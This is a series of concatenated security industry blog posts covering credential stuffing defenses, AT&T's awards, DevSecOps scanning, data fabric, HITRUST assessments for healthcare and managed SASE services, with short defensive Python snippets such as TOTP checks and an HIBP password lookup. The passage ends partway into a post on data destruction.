This blog was written by an independent guest blogger.

Credential stuffing attacks essentially doubled in number between 2020 and 2021. As reported by Help Net Security, researchers detected 2,831,028,247 credential stuffing attacks between October 2020 and September 2021—growth of 98% over the previous year. Gaming, digital and social media, and financial services experienced the greatest volume of attacks during that period. What’s more, the United Kingdom was one of the top three regions from which the most credential stuffing attacks were launched, followed by Asia and North America.

Looking towards the rest of 2022, the security community expects the volume of credential stuffing attacks to grow even further. “Expect to see credential stuffing attacks double in number again in 2022,” noted Forbes.

Why is credential stuffing a concern for organizations?

First, the role of automation in credential stuffing makes it possible for anyone—even attackers with low levels of expertise—to perpetrate these attacks. This low barrier to entry helps to explain why credential stuffing is so pervasive and why it’s expected to keep growing through 2022.

Let’s examine the flow of credential stuffing to illustrate this fact. According to the Open Web Application Security Project (OWASP), a credential stuffing attack begins when a malicious actor acquires compromised usernames and passwords from password dumps, data breaches, phishing campaigns, and other means. They then use automated tools to test those credentials across multiple websites including banks and social media platforms. If they succeed in authenticating themselves with a credential set, they can then conduct a password reuse attack, harvest the compromised account’s information/funds, and/or monetize it on the dark web.

Which brings us to the second reason why credential stuffing is so concerning: the impact of a successful attack can be far-reaching. The consequences of a successful credential stuffing attack are tantamount to those of a data breach, so organizations can bet that data privacy regulations will be enforced.

Meaning? Organizations could incur fines totaling millions of dollars in the aftermath of credential stuffing, per Cybersecurity Dive. Those penalties don’t include the costs that organizations will need to pay to understand the impact of the attack, figure out which data the malicious actors might have compromised, and remediate the incident. They also don’t cover the brand damage and legal fees that organizations could face after notifying their customers.

Credential stuffing defense best practices

To avoid the costs discussed above, organizations need to take action to defend themselves against a credential stuffing attack. Here are seven ways that they can do this.

1. Make credential stuffing defense an ongoing collaborative discussion

Organizations can’t tackle credential stuffing if there’s not even a discussion about the threat. Acknowledging this reality, TechRepublic recommends that organizations bring their security, fraud, and digital teams together to discuss credential stuffing, among other fraud trends, along with ways that they can use digital metrics to coordinate their defense efforts.

2. Implement multi-factor authentication

Credential stuffing hinges on the fact that malicious actors can translate access to a credential set into access to an account. Multi-factor authentication (MFA) removes this pivot point, as it forces attackers to provide another factor, such as an SMS-based one-time code or a fingerprint, in order to authenticate. This raises the barrier to account takeover by forcing malicious actors to compromise those additional authentication factors on top of the original credential set.
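
A minimal sketch of the idea, using time-based one-time passwords (TOTP) with the open-source pyotp library; the account name and secret handling below are illustrative assumptions, not a complete implementation:

```python
# Sketch: TOTP as a second factor, using pyotp (pip install pyotp).
import pyotp

# At enrollment: generate a per-user secret and store it server-side (encrypted).
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)
print("Provisioning URI for the user's authenticator app:",
      totp.provisioning_uri(name="alice@example.com", issuer_name="ExampleCorp"))

# At login: only after the password checks out, verify the submitted code.
submitted_code = input("6-digit code: ")
if totp.verify(submitted_code, valid_window=1):  # tolerate one 30s step of clock drift
    print("Second factor accepted.")
else:
    print("Invalid code; deny access even though the password was correct.")
```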

3. Use security awareness to familiarize employees with password best practices

Organizations can go a long way towards blocking a credential stuffing attack by cultivating their employees’ levels of security awareness. For instance, they can educate their employees on how malicious actors can leverage password reuse as part of a credential stuffing campaign. Per How-To Geek, organizations can also provide employees with a password manager for storing credentials that they’ve created in accordance with company password policies.

4. Analyze and baseline traffic for signs of credential stuffing

Infosecurity Magazine recommends that organizations create a baseline for their traffic including account activity. They can then use that baseline to monitor for anomalies such as a spike in failed login attempts and unusual account access requests.
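
As a rough illustration, the sketch below baselines hourly failed-login counts and flags a spike; the numbers, threshold, and data source are assumptions, and a real deployment would pull these counts from authentication logs or a SIEM:

```python
# Sketch: flag an hour whose failed-login count exceeds baseline mean + z sigma.
from statistics import mean, stdev

def is_anomalous(hourly_failed_logins, current_hour, z=3.0):
    mu = mean(hourly_failed_logins)
    sigma = max(stdev(hourly_failed_logins), 1.0)  # floor sigma so a flat baseline still behaves
    return current_hour > mu + z * sigma

baseline = [12, 9, 15, 11, 8, 14, 10, 13]   # illustrative hourly counts
print(is_anomalous(baseline, 11))    # False: within normal variation
print(is_anomalous(baseline, 250))   # True: possible credential stuffing in progress
```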

5. Prevent users from securing their accounts with exposed passwords

The last thing security teams want is for their employees to use a password that’s been exposed in a previous security incident. After all, malicious actors use data breaches, information dumps, and other leaks to power the automated tools used in credential stuffing. Acknowledging this point, infosec personnel need to monitor the web for these kinds of exposures. They can actively track the news for such incidents, and they can also rely on alerts from data breach tracking services such as Have I Been Pwned (HIBP).
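
For illustration, here is a minimal sketch of checking a candidate password against HIBP’s Pwned Passwords range API; the API uses k-anonymity, so only the first five characters of the password’s SHA-1 hash ever leave your network (error handling and caching omitted):

```python
# Sketch: reject passwords that appear in known breach corpuses via HIBP.
import hashlib
import requests

def password_is_exposed(password: str) -> bool:
    sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    resp = requests.get(f"https://api.pwnedpasswords.com/range/{prefix}", timeout=10)
    resp.raise_for_status()
    # Response lines look like "HASH_SUFFIX:COUNT" for every breached hash sharing the prefix.
    return any(line.split(":")[0] == suffix for line in resp.text.splitlines())

if password_is_exposed("P@ssw0rd"):
    print("Reject this password: it has appeared in a known breach.")
```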

6. Implement device fingerprinting

Infosec teams can use operating system, web browser version, language settings, and other attributes to fingerprint an employee’s device. They can then leverage that fingerprint to monitor for suspicious activity such as a user attempting to authenticate themselves with the device in a different country, noted Security Boulevard. If a circumstance like that arises, security teams can then prompt employees to submit additional authentication factors to confirm that someone hasn’t taken over their account.
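
A bare-bones sketch of the concept follows; the attribute set, hashing scheme, and stored-fingerprint lookup are illustrative assumptions, and production systems use far richer signals:

```python
# Sketch: hash device attributes into a fingerprint; step up auth on unknown devices.
import hashlib

def device_fingerprint(attributes: dict) -> str:
    canonical = "|".join(f"{k}={attributes[k]}" for k in sorted(attributes))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()

known_devices = {"9f2c..."}  # fingerprints previously seen for this user (placeholder)

login_device = device_fingerprint({
    "os": "Windows 11",
    "browser": "Firefox 98",
    "language": "en-GB",
    "timezone": "Europe/London",
})

if login_device not in known_devices:
    # Unfamiliar device: don't block outright, but require an additional factor.
    print("New device detected; prompting for MFA before granting access.")
```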

7. Avoid using email addresses as user IDs

Password reuse isn’t the only factor that increases the risk of a credential stuffing attack. So too does the reuse of usernames and/or account IDs, a point Salt Security makes directly.

“Credential stuffing relies on users leveraging the same usernames or account IDs across services,” it noted in a blog post. “The risk runs higher when the ID is an email address since it is easily obtained or guessed by attackers.”

Consequently, organizations should consider using unique usernames that malicious actors can’t use for their authentication attempts across multiple web services.

Beating credential stuffing with the basics

Credential stuffing is one of the most prevalent forms of attack today. This popularity is possible because of how simple it is for malicious actors to obtain exposed sets of credentials on the web. However, as discussed above, it’s also simple for organizations to defend themselves against credential stuffing. They can do so in large part by focusing on the basics such as implementing MFA, awareness training, and baselining their traffic.

The post 7 ways to defend against a credential stuffing attack appeared first on Cybersecurity Insiders.

Will Eborall, Asst VP, AT&T Cybersecurity and Edge Solutions Product Management, co-authored this blog.

The AT&T Cybersecurity team’s unwavering focus on managing risk while maximizing customer experience earns high marks from security experts and customers alike. The team garnered well-earned official recognition for the quality of the flexible services it runs with the announcement that AT&T won the highest-distinction Gold Award in four different service categories of the 2022 Cybersecurity Excellence Awards.

The highly competitive Cybersecurity Excellence Awards is an annual competition run by Cybersecurity Insiders that honors individuals and companies that demonstrate excellence, innovation, and leadership in information security. AT&T Cybersecurity was recognized as the top solution in the following categories:

  • Managed Security Services
  • Managed Detection and Response (MDR)
  • Endpoint Detection and Response
  • Secure Access Service Edge (SASE)

With over 900 entries across the range of Cybersecurity Excellence Awards categories, the award selection consisted of a two-part process. Finalists for each category were selected from the broader pool of nominations based on popular votes and comments received from the cybersecurity community, as well as the strength of the written nomination. Once finalists were winnowed down, Cybersecurity Insiders’ award judges took a closer look at each finalist nomination’s explanations and examples of the leadership, excellence, and results in cybersecurity afforded by the service to determine winners.

Judges awarded each of the following four services the highest Gold Award for some of the reasons described below:

AT&T Managed Security Services picked up a gold award for Managed Security Services. Some of the considerations looked at by the judges included:

  • As one of the largest MSSPs in the world, AT&T Cybersecurity fosters strong relationships with leading security technology providers while incubating emerging innovators to provide best-in-class services 
  • AT&T Managed Security Services delivers services through eight global SOCs
  • AT&T Cybersecurity delivers accountability with thorough communication and comprehensive reporting to clients along with coordinated responses with defined service level agreements on change requests.
  • During the pandemic, AT&T Cybersecurity has helped customers persevere through the various disruptions caused by COVID-19 with its managed security services.
  • AT&T Cybersecurity supported customers of its AT&T DDoS Defense service as well as non-subscribing customers with emergency mitigation services.

AT&T Managed Threat Detection and Response won a gold award for Managed Detection and Response (MDR). The judges picked this service based on factors that included:

  • AT&T Managed Threat Detection and Response combines technology, intelligence, and 24×7 expertise in a service that can be deployed faster and has a starting price that’s less than the cost to hire a single security analyst.
  • AT&T’s MDR service is priced by the total number of events that are analyzed, so customers don’t have to worry about limitations by assets, environments, or number of employees in their organization.
  • AT&T Managed Threat Detection and Response is delivered through a unified platform that offers threat intelligence updates from AT&T Alien Labs, native cloud monitoring capabilities for IaaS and SaaS environments, service transparency into SOC operations, and built-in orchestration and automation through a single pane of glass.
  • NHS Management, a leader in providing consulting and administrative services to individual healthcare facilities and companies, gained visibility into emerging threats through AT&T’s MDR service that it didn’t have before.

AT&T Managed Endpoint Security earned a gold award for Endpoint Detection and Response. The following were a few of the points that swayed judges in this category:

  • AT&T Managed Endpoint Security offers users top-tier security features that include tamper protection and patented AI algorithms that live on devices, automatic mapping and tracking of all endpoint activity, and IoT discovery and control.
  • The service offers platform integrations with AT&T Alien Labs Threat Intelligence and AT&T Alien Labs Open Threat Exchange (OTX) for better context about the endpoint threat environment
  • Through the AT&T Managed Endpoint Security alliance with SentinelOne, customers receive 24×7 threat monitoring and management by AT&T Security Operations Center (SOC) analysts for greater network visibility and faster endpoint threat detection.
  • AT&T Managed Endpoint Security provides comprehensive endpoint protection against ransomware and other cyberattacks through a unique rollback to safe state feature while also detecting highly advanced threats within an enterprise network or cloud environment.

AT&T SASE won a gold award for Secure Access Service Edge. The judges considered a number of factors, including:

  • AT&T was the first provider to offer a global managed SASE solution at scale, and most recently, AT&T expanded its SASE portfolio to include a new offering, AT&T SASE with Cisco.
  • With combined networking and security technology and service expertise, AT&T SASE offers a future-ready, unified solution through a single provider.
  • With AT&T SASE, businesses can control access for any device connecting from any network. This supports the dynamic needs of today’s distributed workforce while delivering security-driven networking at every edge.

Winning even one cybersecurity solution award is a great distinction, but when a company is able to deliver four different award-winning offerings, we believe that’s a testament to its ability to put together an expert team that listens to the needs of its customers. AT&T Cybersecurity is proud of its results in the Cybersecurity Excellence Awards, which reflect the networking and security expertise that our customers have come to count on. Our crack team of security analysts is constantly researching the threat environment to continually defend customer environments. To learn more about some of the trends they’ve helped organizations contend with in the past year, check out the 2022 AT&T Cybersecurity Insights Report.

The post AT&T Cybersecurity earns four Cybersecurity Excellence Awards appeared first on Cybersecurity Insiders.

In the previous article about the coding process, we covered developers using secure coding practices and how to secure the central code repository that represents the single source of truth. After coding is complete, developers move to the build and test processes of the Continuous Integration (CI) phase. These processes use automation to compile code and test it for errors, vulnerabilities, license conformity, unexpected behavior, and of course bugs in the application.

The focus of DevSecOps is to help developers follow secure-coding best practices and open-source licensing policy that were identified in the planning process. In addition, DevSecOps helps testers by providing automated scanning and testing capabilities within the build pipeline.

What is in a build pipeline?

Build pipelines run on highly customizable platforms like Microsoft Azure DevOps, Jenkins, and GitLab. The build pipeline pulls source code from a repository and packages the software into an artifact. The artifact is then stored in a different repository (called a registry) where it can be retrieved by the release pipeline. Jobs in the build pipeline perform the step-by-step tasks to create an application build. The jobs can be grouped into stages that run sequentially every time the build process is run. Jobs need a build server, or a pool of build servers, to run the pipeline and return a built application for testing.
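
As a toy illustration of that stage-and-job structure (real pipelines are defined in platform-specific formats such as Jenkinsfiles or GitLab CI YAML), consider this minimal runner; the stage names and commands are placeholders:

```python
# Sketch: stages run in order; any failing job stops the whole build.
import subprocess

PIPELINE = {
    "fetch":   ["git pull"],
    "build":   ["make build"],
    "package": ["make artifact"],
}

for stage, jobs in PIPELINE.items():
    print(f"--- stage: {stage} ---")
    for job in jobs:
        subprocess.run(job, shell=True, check=True)  # check=True fails fast
```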

Pipeline DevSecOps

DevSecOps partners with developers by inserting additional source code scanning tools as jobs into the build pipeline. The tools used depend on what is being built and are usually determined through DevSecOps collaboration with the development team to understand the architecture and design of the code. For most projects, DevSecOps should implement, at a minimum, the scanning tools that look for vulnerabilities, poor coding practices, and license violations.

Source code scanners

Pipelines allow automated application security (AppSec) scans to be run every time a new build is created. This capability allows DevSecOps to integrate static analysis (lint) tools like source code scanners that can run early in the software development lifecycle. Security scanners come in two forms: static application security testing (SAST) and dynamic application security testing (DAST).

SAST is run early in the development lifecycle because it scans source code before it is compiled. DAST runs after the development cycle and is focused on finding the same types of vulnerabilities hackers look for while the application is running.

SAST can look for supply chain attacks, source code errors, vulnerabilities, poor coding practices, and free open-source software (FOSS) license violations. SAST speeds up code reviews and delivers valuable information early in the project so developers can incorporate better secure coding practices. Picking the right SAST tool is important because different tools can scan different coding languages. By automating scanning and providing feedback early in the development process, developers are empowered by DevSecOps to be proactive in making security related code changes before the code becomes an application.
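
As one hedged example of such a gate, the sketch below runs Bandit, an open-source SAST tool for Python code bases, and fails the build when high-severity findings appear; the scanned path and the severity policy are assumptions:

```python
# Sketch: a pipeline job that blocks the build on high-severity SAST findings.
import json
import subprocess
import sys

proc = subprocess.run(
    ["bandit", "-r", "src", "-f", "json"],  # scan ./src, emit machine-readable output
    capture_output=True, text=True,
)
findings = json.loads(proc.stdout).get("results", [])
high = [f for f in findings if f["issue_severity"] == "HIGH"]

for f in high:
    print(f"{f['filename']}:{f['line_number']}: {f['issue_text']}")

sys.exit(1 if high else 0)  # non-zero exit tells the pipeline platform to stop
```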

Container image scanners

Application builds that create containers for microservices like Docker are stored in a registry as an image artifact. These images contain the application code along with the additional software packages and dependencies that are needed to run the application. Sometimes the images are built by the developers, and other times they are pulled from a public repository like GitHub.

Where source code scanners review the source code, image scanners review the built application with its packages and dependencies. Image scanners look for container vulnerabilities and exploits like supply chain attacks and cryptojacking software.

Image scanners should be run during the build process so that vulnerabilities are identified and remediated by the development team quickly. Keeping an image small (fewest needed packages and dependencies) is a great (and easy) way for developers to reduce the attack surface of the image and speed up security scanning and remediating vulnerabilities.
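
For illustration, a pipeline job wrapping an image scanner might look like the sketch below, using the open-source Trivy scanner as an example; the image name and severity policy are assumptions:

```python
# Sketch: fail the pipeline when an image has HIGH or CRITICAL vulnerabilities.
import subprocess
import sys

IMAGE = "registry.example.com/payments-api:1.4.2"  # hypothetical image under test

result = subprocess.run([
    "trivy", "image",
    "--severity", "HIGH,CRITICAL",  # only consider serious findings
    "--exit-code", "1",             # return non-zero when such findings exist
    IMAGE,
])

if result.returncode != 0:
    print(f"Blocking release: {IMAGE} has HIGH/CRITICAL vulnerabilities.")
    sys.exit(result.returncode)
```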

In addition to image scanning, DevSecOps recommends the following criteria to protect the application. Images should be configured to not run on the host system using the admin (root) account. This protects the host from privilege escalation if the application is compromised.

Images should be signed by a trusted certificate authority so they have a trusted signature that can be verified when the image is deployed to an environment. Images should be stored in a dedicated image repository so that all internal microservices platforms (Docker and Kubernetes) only pull “approved” images.

Test process

Testing is one of the first environments that an application build is deployed into. Testing teams use tools like Selenium and Cucumber to help automate as much of the testing as possible. Automated test plans can benefit from iterative improvements that increase test plan quality every time a build is created. DevSecOps has open-source tools like ZAP that support proxying and can sit between the testing tools to perform security scanning while the tests are exercising the application. Bringing DevSecOps and the testing teams together helps build trust and collaboration while speeding up testing and reducing the number of scripts and tools necessary to complete the testing process.
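
One possible shape for that integration is sketched below, driving ZAP from a test job through its Python client (python-owasp-zap-v2.4); it assumes a ZAP daemon is already running locally on port 8080, and the target URL and API key are placeholders:

```python
# Sketch: spider and actively scan a test environment through a local ZAP daemon.
import time
from zapv2 import ZAPv2

TARGET = "http://test-env.example.com"  # hypothetical application under test
zap = ZAPv2(apikey="changeme",
            proxies={"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"})

scan_id = zap.spider.scan(TARGET)            # discover the app's URLs
while int(zap.spider.status(scan_id)) < 100:
    time.sleep(2)

scan_id = zap.ascan.scan(TARGET)             # actively probe what was found
while int(zap.ascan.status(scan_id)) < 100:
    time.sleep(5)

for alert in zap.core.alerts(baseurl=TARGET):
    if alert["risk"] == "High":              # surface serious findings with test results
        print(f"{alert['alert']}: {alert['url']}")
```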

Bending the rules

Outages, quality issues, and common mistakes can happen when there is pressure to deliver in a compressed timeframe. Building and testing are where bending the rules may be accepted, or even the current norm, within teams. Security scanners are designed to stop the build process if audits and compliance checks fail. If the development and testing teams are unaware of this risk, it will appear to them as builds and tests breaking. They will complain to their leaders, who will come to the DevSecOps team and demand the tools get out of the way of the success of DevOps.

DevSecOps overcomes these concerns by being an integral part of the team with developers and testers. Coordination between DevSecOps and developers is also promoted by adding the findings from these tools into the same bug tracking tools used by testers. DevSecOps integrates by communicating changes, listening to and incorporating feedback, creating inclusiveness, and collaborating to help everyone understand what the tools are doing, how they work, and why they are important.

Next steps

Security scanners help developers follow secure-coding and license compliance practices. Scanners and feedback work best when performed as early as possible in the build pipeline so adjustments can be made quickly and with minimal development impact. Using automation encourages developers and testers not to bend the rules. With the application built and tests complete, the software is ready to be packaged as a release.

The post DevSecOps build and test process appeared first on Cybersecurity Insiders.

This blog was written by an independent guest blogger.

Amidst sweeping digital transformation across the globe, numerous organizations have been seeking a better way to manage data. Still in the beginning stages of adoption, data fabric provides many possibilities as an integrated layer that unifies data from across endpoints. 

A combination of factors has created a digital environment where data is stored in several places at once, leaving cracks in security for fraudsters to take advantage of. Cybercrime has reached historic highs, with vulnerabilities that affect crucial industries such as healthcare, eCommerce, and manufacturing. 

Data fabric works like a needle and thread, stitching each business resource together as an interconnected data system that feeds data into one large connector. When each application is connected to every other part of your system, data silos are broken, allowing for complete transparency in the cloud or a hybrid approach. 

What is data fabric? How does it work? And how does data fabric impact cybersecurity? Let’s dive in. 

What is data fabric?

Data fabric is a modern data design concept to better integrate and connect processes across various resources and endpoints. Data fabric can continuously analyze assets to support the design and deployment of reusable data across all environments. 

By utilizing both human and machine capabilities, data fabric identifies and connects disparate data. This supports faster decision-making, re-engineering optimization, and enhanced data management practices.

You could think of data fabric as a passive data observer that only acts when it encounters assets that need to be managed. Based on its specific implementation, a data fabric can automatically govern data and make suggestions for data alternatives. Humans and machines work together to unify data and improve efficiency overall.

How does it work?

Data fabric architecture provides strategic security and business advantages for companies and organizations. To better understand how data fabric works, let’s go over the six different layers of data fabric:

  • Data management — This layer is responsible for data security and governance. 
  • Data ingestion — This layer finds connections between structured and unstructured data.
  • Data processing — This layer refines data for accurate and relevant extraction.
  • Data orchestration — This layer makes data usable for teams by transforming, integrating, and cleansing the data. 
  • Data discovery — This layer surfaces new opportunities to integrate and develop insights from disparate data sources.
  • Data access — Finally, this layer ensures that permissions and compliance conditions are met and allows access through virtual dashboards. 

This integrative and layered approach to data management helps protect organizations against the most prevalent attack types such as client-side, supply chain, business app, and even automated attacks. 
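
As a purely hypothetical sketch of the kind of check the data access layer performs, the snippet below verifies a user’s role and a simple data-residency condition before exposing an asset; all names and rules here are illustrative:

```python
# Sketch: a data access layer gating an asset on roles plus a compliance condition.
from dataclasses import dataclass

@dataclass
class DataAsset:
    name: str
    classification: str        # e.g. "public", "internal", "restricted"
    allowed_roles: set

def can_access(user_roles: set, user_region: str, asset: DataAsset, data_region: str) -> bool:
    if not (user_roles & asset.allowed_roles):
        return False  # permission check failed
    if asset.classification == "restricted" and user_region != data_region:
        return False  # compliance condition: restricted data stays in-region
    return True

asset = DataAsset("customer_profiles", "restricted", {"analyst", "fraud-team"})
print(can_access({"analyst"}, "EU", asset, "EU"))  # True
print(can_access({"analyst"}, "US", asset, "EU"))  # False: residency rule blocks it
```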

Who can benefit from data fabrics?

Because data fabric use cases are still developing, there are potentially many unknown instances where data fabric can provide a security advantage for organizations. The possibilities are broad, given data fabric’s ability to eliminate silos and integrate data across various sources. Data fabric can be implemented as an identity theft prevention strategy, as a way to improve performance, and for everything in between.

Here are just a few specific use cases for data fabric architecture:

  • Customer profiles
  • Preventative maintenance
  • Business analysis
  • Risk models
  • Fraud detection

Advantages of data fabric architectures

Even in its early stages, data fabric has been shown to improve efficiency from workflows to product life cycles significantly. In addition to increasing business productivity, here are some other examples of how adopters can benefit from a data fabric architecture:

  1. Intelligent data integration

Data fabric architectures use AI-powered tools to unify data across numerous endpoints and data types. With the help of metadata management, knowledge graphs, and machine learning, data fabric makes data management easier than ever before. By automating data workloads, a data fabric architecture not only improves efficiency but also eliminates siloed data, centralizes data governance, and improves the quality of your business data.

  2. Better data accessibility

The centralized nature of data fabric systems makes accessing data from various endpoints fast and simple. Data bottlenecks are reduced since data permissions can be controlled from a centralized location, regardless of users’ physical locations. And data access can easily be granted when necessary for use by engineers, developers, and analysts. Data fabric enables workers to make business decisions faster and allows teams to prioritize tasks from a holistic business perspective.

  3. Improved data protection

Possibly the most crucial aspect of implementing data fabric is that it improves your data security posture. You get the best of both worlds: broad data access and improved data privacy. With more data governance and security guardrails in place thanks to a unified data fabric, technical and data security teams can streamline encryption and data masking procedures while still being able to grant access to data based on user permissions.

Data fabric and cybersecurity

As part of a robust cybersecurity ecosystem, data fabric acts as the foundation upon which the entirety of your business data sits. When used correctly, data fabric makes business processes more efficient and improves data protection with the right defensive strategies built in.

Because data fabric acts as a single source for all business data, many wonder about its cybersecurity implications. Most open source security vulnerabilities have a validated fix available, but many attackers take advantage of these entry points before organizations have time to update their software.

Organizations using data fabric can also benefit from cybersecurity mesh to combine automation with a strategic security approach. Data mesh relies on the organizational structure to define data security needs so that the data fabric can more efficiently align with those needs. 

Gartner predicts that organizations that adopt a data fabric and cybersecurity mesh architecture will reduce the financial impact of data breaches by 90% by 2024. No other cybersecurity posture comes close to the security implications of data fabric across business applications. 

Data fabric is also essential to cybersecurity infrastructure because it requires that teams adopt a security-by-design outlook. With centralized data fabric built into your environment, organizations can greatly reduce their vulnerabilities and attack vectors from the inside out. 

Putting it all together

Data fabric provides organizations with a way to integrate data sources across platforms, users, and locations so that business data is available to those that need it when it is needed. While this does reduce data management issues, it raises important cybersecurity questions related to its centralized nature. 

However, data fabric and cybersecurity mesh work together to build integrated security controls that include encryption, compliance, virtual perimeter, and even real-time automatic vulnerability mitigation.

Now, stand-alone security solutions protecting numerous data sources can work together to improve security efforts overall. Data fabric is an essential aspect of a business-driven cyber strategy, especially for industries utilizing hybrid cloud setups, businesses struggling with disparate data, and an evolving cybersecurity landscape.

The post What is data fabric and how does it impact Cybersecurity? appeared first on Cybersecurity Insiders.

Data breaches are still on the rise in healthcare. 2021 accumulated 686 healthcare data breaches of 500 or more records, resulting in 45M exposed or stolen healthcare records. 2022 is off to a poor start, with over 3.7M healthcare records compromised as of 3/2/2022.[1]

Healthcare organizations face a landscape that is increasingly riddled with complexities, threats, and a multitude of attack vectors. The pandemic took a toll on hospitals, and ransomware attacks increased significantly. Nevertheless, healthcare organizations must continue to provide patient care through various avenues that necessitate emerging and advanced digital solutions, like edge computing. With that comes cybersecurity risk. This can be challenging for even the most mature organizations, but there are many healthcare organizations that are still lagging behind and do not have the fundamentals of cybersecurity in place.

Cybersecurity frameworks for the healthcare industry

Frameworks are becoming increasingly important to build that foundation, to measure improvements, and to drive results. Frameworks allow for a defensible and rational approach to managing your cybersecurity risks and complying with regulatory requirements. Many regulations purposely strike a balance between specificity and flexibility to allow organizations latitude in applying the requirements based upon their size, complexity, and risk assessment.

Established frameworks are adopted across industries, some are industry-specific, but all continue to evolve as cybersecurity risks evolve. Most recently, we have seen the newly updated ISO 27002 standard published last month; the DoD has come out with CMMC 2.0 (NIST 800-171r2); and the National Institute of Standards and Technology (NIST) regularly publishes new and updated standards.

The need for a vertical-specific framework

Adoption of a particular framework can vary from industry to industry.  One such framework is the HITRUST CSF that has been heavily adopted in the healthcare industry.  The HITRUST CSF was established to provide prescription and consistency in the application of security and privacy controls for healthcare organizations. It provides for the protection of health data by creating a single framework that harmonizes various, related compliance requirements and industry standards.  While HITRUST is no longer focused on only the healthcare industry, the adoption of the HITRUST CSF can help organizations in healthcare lay the foundation and continuously improve their cybersecurity posture and address existing and emerging threats. 

The HITRUST CSF is valuable to healthcare organizations for the reasons mentioned above: it provides a defensible approach to compliance with HIPAA, it is prescriptive in control implementation, and it is continually updated based upon the threats and risks the healthcare industry faces. The healthcare industry not only has to demonstrate cybersecurity risk management to regulators, but to business partners and clients as well. HITRUST offers certification for this purpose.

HITRUST has added two new assessments to provide organizations with options. The assessment formerly known as the HITRUST CSF Validated Assessment could be daunting for some organizations to take on. Given this, HITRUST published in early 2022 what is called the Implemented, 1-Year (i1) Assessment. This assessment allows organizations to take a streamlined, crawl-walk-run approach to assurance and certification.

The i1 Assessment is based upon a static set of 219 controls with substantial coverage for NIST SP 800-171 revision 2, the HIPAA Security Rule, and the AICPA Availability Trust Services Principle, evaluating the maturity of control implementation. This is an attractive assessment for organizations that need to demonstrate a moderate level of assurance and are willing to go through the assessment and certification process on an annual basis. It is also a good stepping stone to higher levels of assurance.

This does not replace the former HITRUST CSF Validated Assessment, which is now called the Risk-Based, 2-Year (r2) Assessment. The r2 Assessment’s requirements are risk-based: the number of controls is dependent on scoping factors and will vary from organization to organization. The evaluation of the controls is very rigorous, analyzes policy, process, implemented, measured, and managed maturity, and demonstrates high assurance.

Also new in 2022 is the Basic, Current-state (“bC”) Assessment, which is a self-assessment focused on good security hygiene controls and is suitable for quick and low assurance requirements. There is coverage for NISTIR 7621: Small Business Information Security Fundamentals.

The bC, i1, and r2 provide various assurance options to meet organizational, partner, and client needs, and they continue to reduce the effort of responding to third-party requests to demonstrate a sound security posture.

Balancing risk while transforming the delivery of patient care necessitates adopting a framework that is sustainable and continually updated, especially as healthcare organizations invest in cybersecurity strategies like securing the edge.

[1] U.S. Department of Health and Human Services Office for Civil Rights Breach Portal: Notice to the Secretary of HHS Breach of Unsecured Protected Health Information

The post Healthcare focus:  Need for resilience appeared first on Cybersecurity Insiders.

Recently the architecture model known as Secure Access Service Edge (SASE) has been gaining momentum. That’s not surprising when the model provides benefits including reduced management complexity, improved network performance and resiliency, security policy implemented consistently across office and remote users, and lower operational expense. In fact, according to a recent ESG survey, 70% of businesses are using or considering a SASE solution. But if SASE is supposed to simplify network and security management, then one may wonder, “what value does a managed services provider (MSP) offer?”

Why an MSP for SASE deployment?

There are a great number of answers to that question, but a good place to start is understanding that the journey to SASE is going to be a little different for every enterprise. There are many approaches and models in the market and many vendors to choose from.

First of all, one major reason that businesses are utilizing an MSP for SASE is that it’s difficult and expensive to hire and retain technicians with the specialized skillset required, particularly if 24/7 monitoring is needed. In fact, according to a recent study, 57% of organizations have been negatively impacted by the cybersecurity skills shortage. Sometimes it just makes more financial sense, and can improve an organization’s risk posture, to outsource this to a trusted third party.

In addition, while many technology providers claim to offer a complete SASE portfolio, it is important to note that it is not an off-the-shelf solution and can include many different components. There has been a lot of consolidation in the market over the past several years, with vendors acquiring other companies to build a more well-rounded suite, which has resulted in multiple management platforms. Most vendors are working to consolidate these to offer management through a single pane of glass but few have achieved that quite yet.

And then finally, SASE is not a “one and done” or plug-and-play solution. The vast majority of businesses are not going to rip out and replace their entire infrastructure at one time. Rather, it will be a gradual roll out of capabilities as they come upon their refresh cycle or as budgets for new initiatives are approved. Most large or well-established companies will be on a hybrid environment for the foreseeable future, with assets hosted in both the data center as well as in the cloud.

Benefits of working with an MSP

Sometimes it is difficult to know where to start with a multi-faceted solution such as SASE, and that is why it is so important to have a trusted advisor you can count on. Here are some of the key benefits you can expect to realize when working with industry-leading managed service providers:

  • Accelerated time to value and scale: A qualified MSP for SASE implementation will offer consulting services that can determine your organization’s readiness for SASE, identify the best solutions for your unique needs, and help chart a roadmap for rollouts. Should your business acquire other companies, add or reduce locations, or change workplace designations, it is often as simple as contacting your MSP, providing the required information, and signing a contract addendum.
  • Security and networking expertise: Because SASE is a convergence of software-defined wide-area networking and security, you will need someone with knowledge and experience in both disciplines. MSPs can meet this requirement and have the ability to integrate these components to deliver resilient, high-performance connectivity and protection.
  • Solution development experience: With so many vendors and solutions on the market, it may be difficult to know which offer the best mix of capabilities, protection, and performance. Conducting multiple proof of concepts (POCs) can be costly and time consuming. MSPs can remove this burden from your technology teams by evaluating offers, conducting comprehensive interoperability testing, technical validation, and solution certification to deliver the industry’s best technology elements that seamlessly work together.
  • Solution integration acumen: As mentioned above, it is unlikely that your organization will replace every component of its networking and security at the same time, which means that you will have legacy infrastructure that still needs to be supported alongside the new technology components, and they may even be from different vendors. Managed service providers have the ability to integrate and manage a vast ecosystem of technology providers and capabilities in order to secure your entire environment.

Conclusion

With the rapid adoption of cloud delivered applications and services, the heightened expectations of customers when it comes to digital experience, and the pressing need to support work from anywhere, it is less a question of whether your business will adopt SASE, but rather when. In fact, you may have already started without knowing it. Regardless of where you are on your journey, an MSP can help ensure you avoid unnecessary detours and that you reach your desired outcomes.

The post Why use a managed services provider for your SASE implementation appeared first on Cybersecurity Insiders.

This blog was written by an independent guest blogger.

As Morgan Stanley Bank now knows, ignoring certified data destruction policies can be disastrous. The bank made news in 2020 when it was fined over $60 million for not using proper oversight when decommissioning two of its data centers. Regulators found that the organization had not addressed the risks associated with decommissioning hardware effectively. 

An ever-increasing number of IoT and business-connected devices creates numerous electronic entry points for hackers, but companies should also take care when decommissioning their hardware. Unfortunately, studies show that many companies lack the necessary precautions for data destruction.

What is data destruction?

